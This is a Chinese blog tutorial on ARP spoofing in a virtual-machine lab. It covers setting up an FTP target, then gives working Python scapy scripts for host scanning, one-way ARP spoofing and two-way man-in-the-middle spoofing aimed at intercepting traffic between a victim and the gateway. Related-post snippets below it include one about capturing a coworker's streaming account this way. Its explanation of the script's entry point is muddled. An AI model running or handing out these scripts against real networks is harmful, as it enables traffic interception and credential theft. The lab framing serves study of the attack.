ARP欺骗程序代码实现

于 2023-12-29 15:26:36 发布
阅读量400 收藏 8
点赞数 12
文章标签: python 开发语言 网络协议 网络安全 vim 开源
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63708690/article/details/135291325
版权

首先需要配置环境:

选择三台虚拟机,我选择的是:Win2008(充当客户机1),CentOS(充当客户机2),kali(充当攻击者)

1.先让它们在同一网段(比如都在10网段,即Win2008:ip:192.168.10.101  CentOS: ip:192.168.10.102  kali:ip:192.168.10.103),相互可以ping通

2.在CentOS搭建ftp服务器,并添加用户

yum install vsftpd

配置vsftpd.conf 默认位置:/etc/vsftpd/vsftpd.conf          anonymous_enable=NO

在CentOS中添加用户 用于ftp连接 :useradd alice –d /home/alice

                                                        passwd alice

启动vsftpd :systemctl start vsftpd

关闭防火墙 systemctl stop firewalld  / systemctl disable firewalld

3.Win2008连接到CentOSftp服务器:在浏览器输入:ftp://192.168.10.102

4.kali:因为要用到scapy库,但是有的是没有pip的即需要下载pip

以kali2023版为例:下载pip:

wget https://bootstrap.pypa.io/get-pip.py

python get-pip.py

下载成功后检查:pip -V  出现pip的版本即代表成功

环境搭建成功就可以写代码啦!

扫描某网段的存活主机:

python3 XX.py(XX:你自己定义的python名)

#!/usr/bin/env python3
from scapy.all import *
from scapy.layers.l2 import Ether, ARP

ip = "192.168.XX.101"
wifi = "eth0"

p = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst="192.168.XX.1/24")
ans, unans = srp(p, timeout=2, iface=wifi)

print("一共扫描到%d台主机:" % len(ans))
result = []
for s, r in ans:
    result.append([r[ARP].psrc, r[ARP].hwsrc])
result.sort()
for ip, mac in result:
    print(ip, "----->", mac)

arp欺骗代码:

#!/usr/bin/python

import sys
import time
from scapy.all import *
from scapy.layers.l2 import Ether, ARP


def arpspoof(ip1,ip2):
    try:
        pkt=Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip1,psrc=ip2)
        sendp(pkt)
        return
    except:
        return
def main():
    if len(sys.argv)!=3:
        print ("输入:  ./arp_spoof.py IP1 IP2")
        sys.exit()

    ip1 = str(sys.argv[1]).strip()
    ip2 = str(sys.argv[2]).strip()

    while True:
        try:
            arpspoof(ip1,ip2)
            time.sleep(0.5)
        except KeyboardInterrupt:
            print ("no....")
            break

if __name__== '__main__':
    main()

      def arpspoof(): 这个函数构造并发送一个ARP欺骗数据包。 尝试将目标IP的主机ARP缓存中的MAC地址更改为欺骗者的MAC地址。如果发生任何异常,该函数将返回。

        main(): 函数首先检查命令行参数的数量。如果参数数量不等于3(脚本名+两个参数),则显示用法信息并退出程序。 如果参数数量正确,它会从命令行参数中获取目标IP和网关IP。然后,它进入一个无限循环,持续发送ARP欺骗数据包,并在每次发送后休眠0.5秒。 如果用户按下键盘中断(Ctrl+C),则退出循环。 **脚本执行**: 如果直接运行这个脚本(例如通过命令python arp_spoof.py),则if name== 'main':这一行确保main()函数不会被执行。但是,如果你通过命令行参数运行这个脚本,例如python arp_spoof.py 192.168.10.101 192.168.10.254,则main()函数会被执行。

ARP双向欺骗代码:(可以监听被攻击的两台主机的消息)

#!/usr/bin/env python3
from scapy.all import *             #导入scapy模块
from optparse import OptionParser       #导入命令行参数处理模块optparse
import sys

from scapy.layers.l2 import getmacbyip, Ether, ARP


def main() :
    usage = "Usage: [-i interface] [-t targetip] [-g gatewayip]"
    parser = OptionParser(usage)
    parser.add_option('-i',dest='interface',help='select interface(input eth0 or wlan0 or more)')#-i 所选择的网卡,eth0或wlan0,存放在interface变量中
    parser.add_option('-t',dest='targetip',help='select ip to spoof')#-t 要攻击的ip,存放在targetip变量中
    parser.add_option('-g',dest='gatewayip',help='input gateway ip')#-g 网关ip,存放在gatewayip变量中
    (options,args)=parser.parse_args()
    if options.interface and options.targetip and options.gatewayip:
        interface=options.interface
        tip=options.targetip
        gip=options.gatewayip
        spoof(interface,tip,gip)#将参数传给spoof函数
    else:
        parser.print_help()#显示帮助
        sys.exit(0)
def spoof(interface,tip,gip):#获取命令行的输入实现arp攻击
    localmac=get_if_hwaddr(interface)#get_if_hwaddr获取本地网卡MAC地址
    tmac=getmacbyip(tip)#根据目标ip获取其MAC地址
    gmac=getmacbyip(gip)#根据网关ip获取其MAC地址
    ptarget=Ether(src=localmac,dst=tmac)/ARP(hwsrc=localmac,psrc=gip,hwdst=tmac,pdst=tip,op=2)#构造arp响应包,欺骗目标机器网关的MAC地址为本机MAC地址
    pgateway=Ether(src=localmac,dst=gmac)/ARP(hwsrc=localmac,psrc=tip,hwdst=gmac,pdst=gip,op=2)#构造arp响应包,欺骗网关目标机器的MAC地址为本机MAC地址
    try:
        while 1:
            sendp(ptarget,inter=2,iface=interface)
            print ( "send arp reponse to target1(%s),target2(%s) macaddress is %s"%(tip,gip,localmac))
            sendp(pgateway,inter=2,iface=interface)
            print ( "send arp reponse to target2(%s),target1(%s) macaddress is %s"%(gip,tip,localmac)) #不断发送arp响应包欺骗目标机器和网关,直到ctrl+c结束程序
    except KeyboardInterrupt:
        sys.exit(0)
if __name__=='__main__':
    main()

海绵宝宝的鱼
关注
  • 12
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
arp欺骗实战
LoperX的博客
03-24 1426
arp欺骗原理 arp欺骗基于arp协议,当请求主机需要访问另一个网段的主机时,需要检查相应的arp缓存表中有无对应的ip与mac地址,若没有,请求主机则会在网段中广播arp请求报文,当网关收到arp请求报文后,会单播发送arp回应报文来告诉请求主机网关的mac地址,当请求主机收到arp回应报文后,会在arp缓存表中记录相应的ip与mac地址,然后直接访问网关,网关再去访问下一个网段 主机型arp...
Centos7安装arpspoof
qq_25147521的博客
11-30 6909
Linux安装arpspoof进行arp攻击实验 注:仅可用于学习arp原理及攻击防护,切勿用于非法用途!!! 环境:centos7 一.下面是需要的所有依赖包,yum源都有,只有dsniff和libnids需要另外下载,直接yum安装就可以: yum -y install libICE libSM libXmu libpcap libnet libXext libXext-devel li...
arpspoof实现内网欺骗
lansefly1990的专栏
01-21 2万+
arpspoof 是一款进行arp欺骗的工具,攻击者通过毒化受害者arp缓存,将网关mac替换为攻击者mac,然后攻击者可截获受害者发送和收到的数据包,可获取受害者账户、密码等相关敏感信息。 本次测试是在局域网内进行 ,利用kali截获centos相关数据 攻击者ip:192.168.157.129 受害者ip:192.168.157.250 1、在kali中开启端口转发功能: echo...
arpspoof 安装和使用
java技术博客
07-26 2834
安装参考https安装测试安装是否成功arpspoofVersion2.4Usage。
arpspoof-master
06-14
arpspoof是Linux下的一款局域网欺骗工具,可以使用它对局域网进行断网攻击,获取信息等
ARP欺骗程序
05-26
用于ARP欺骗代码,一个ARP欺骗的小程序
新建文件夹_arp欺骗_
10-02
根据 ARP 欺骗的原理,设计网管欺骗程序,编写代码实现对内网 PC 的欺骗。 首先检索网络设备列表,遍历并将所有的设备列表打印出来,选择所要欺骗的网 络设备打开其适配器,判断链路层类型是否为以太网,存下子网...
C++实现基于WinPcap的ARP欺骗程序源码+sln解决方案+项目说明.zip
最新发布
06-19
C++实现基于WinPcap的ARP欺骗程序源码+sln解决方案+项目说明.zipC++实现基于WinPcap的ARP欺骗程序源码+sln解决方案+项目说明.zipC++实现基于WinPcap的ARP欺骗程序源码+sln解决方案+项目说明.zipC++实现基于WinPcap的...
ARP欺骗程序
12-23
本篇将详细讲解C#实现的反ARP欺骗程序及其核心概念。 首先,我们要理解ARP协议的作用。在局域网中,IP地址和MAC地址是通信的基础,而ARP协议用于将IP地址映射到相应的物理(MAC)地址。当一个设备想要与另一个设备...
ARP欺骗程序源代码
04-27
### ARP欺骗程序源代码解析与理解 #### 一、ARP欺骗技术概览 ARP(Address Resolution Protocol)协议是网络层到链路层的地址转换协议,主要用于将IP地址转换为对应的物理地址(如MAC地址)。在局域网环境中,设备...
ARP欺骗:使用工具:arpspoof、driftnet和ettercap
Zeker62的博客
07-21 7713
作为一个小白,下午两点钟去听了一个网络公开课,了解了一下两个工具的使用,他也给我复习了一下arp欺骗ARP欺骗俗称ARP中间人攻击 防范方法 简而言之,就是骗取受害主机误认为是网关,然后把流量数据发给攻击方,攻击方可以截获流量数据。 攻击条件: 攻击方要知道被攻击方的IP地址,以及被攻击方的网关地址 攻击方和被攻击方处于同一局域网下 开始一定要设置一下路由转发 echo 1 > /proc/sys/net/ipv4/ip_forward 这个是表示数据包能否转发,这个都不开,那直接白给
centOS下安装ettercap
王三三
04-23 4924
ettercap下载地址 http://ettercap.sourceforge.net/download.php下载好之后解压出来,进入到解压目录#tar zxvf ettercap-NG-0.7.3.tar.gz #cd ettercap-NG-0.7.3阅读README# vim README MANDATORY: //安装必须依赖的
Kali Linux进行内网攻击--》使用arpspoof
qq_28534619的博客
07-21 4168
1.首先我选择的是虚拟机                 ------->虚拟机中一定要记住选择桥接,这样有利于和你的IP处于同一网段上,否则会报一个错误就是无法找到目标 2.进行网络IP扫描,                 ------>使用命令          fping -a -g ip的起始 ip的结束 3.进行攻击                 ------>使用命令
Kali Linux使用arpspoof命令进行断网攻击(ARP欺骗
湖北杰哥的博客
11-21 7万+
kali使用arpspoof命令进行ARP欺骗,最终效果是利用kali干扰物理机不能正常上网。
使用arpspoof进行arp欺骗
热门推荐
while(1) { smile(); }
12-01 10万+
ARP欺骗介绍 地址解析协议(ARP),ARP(Address Resolution Protocol),是一个位于TCP/IP协议栈中的网络层。当局域网内计算机间(或者是计算机与网关间)需要通信时,使用ARP协议获取目标IP地址对应的MAC地址,然后计算机间再通过该MAC地址完成数据包发送。ARP欺骗一般目的是把自己伪装成网关,从而欺骗目标机器,使本应发送到真实网关的数据包发送到欺骗者的机器。
使用arpspoof实现内网ARP欺骗
swartz_lubel的专栏
10-27 1万+
ARP欺骗是一种中间人攻击,攻击者通过毒化受害者的ARP缓存,将网关的MAC替换成攻击者的MAC,于是攻击者的主机实际上就充当了受害主机的网关,之后攻击者就可以截获受害者发出和接到的数据包,从中获取账号密码、银行卡信息等。一个实现ARP欺骗的简单工具是arpspoof实验环境受害者主机:192.168.1.105攻击者主机:192.168.1.106实验过程1.ARP欺骗攻击之前,受害者主机的AR
使用arpspoof获取同事爱奇异账户
柳似烟的专栏
09-05 7011
之前没事的时候,使用nmap检测到路由器存在弱口令admin 今天没事登录路由器看看哪台机器流量比较多,刷新了几次流量统计,发现10.0.0.81的机器一直排的首位,流量蛮大,于是想看看这台机器在干什么 打开我的kali系统,启动arpspoof,准备命令arpspoof -i etho -c own -t 10.0.0.81 10.0.0.1 启动Wireshark,设置过滤条件i
arpspoof
weixin_42321419的博客
06-25 3555
呼。。。。这个工具也是折腾了好长时间才达到了自己想要的结果,在此分享一下,也权当笔记记下。Linux下开始时按照教程直接arpspoof -i wlan0 -t xxx.xxx.xxx.xxx(靶机ip地址) xxx.xxx.xxx.xxx(靶机网关IP地址)的确可以对靶机进行断网攻击,也能抓到一些靶机数据包。之后开启ip转发功能echo 1 > /proc/sys/net/ipv4/ip_...
arp欺骗是怎么实现
05-21
ARP欺骗是一种网络攻击技术,它的实现原理是攻击者发送虚假的ARP(Address Resolution Protocol)响应数据包,来欺骗局域网内其他设备的ARP缓存表,使得这些设备的通信流量被重定向到攻击者的设备上。攻击者可以通过这种方式窃取敏感信息,拦截通信,甚至篡改数据。 具体来说,ARP欺骗攻击的实现过程如下: 1. 攻击者通过程序或手动操作,发送虚假的ARP响应数据包,其中包含攻击者MAC地址和受害者IP地址的映射关系。 2. 受害者设备收到这个虚假的ARP响应数据包后,会将攻击者的MAC地址与受害者IP地址的映射关系存入ARP缓存表中。 3. 当受害者设备想要发送数据给同一局域网内的其他设备时,会根据目标设备的IP地址查询ARP缓存表,得到相应的MAC地址,然后将数据包发送给该MAC地址对应的设备。 4. 由于攻击者已经成功欺骗了ARP缓存表,受害者设备发送的数据包实际上会被重定向到攻击者的设备上。 5. 攻击者可以在自己的设备上对这些数据包进行拦截、篡改或窃取敏感信息等操作。 需要注意的是,ARP欺骗攻击只能在局域网内进行,攻击者和受害者必须在同一物理网络中。同时,受害者设备可以通过更新ARP缓存表或者使用静态ARP表来防止ARP欺骗攻击。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值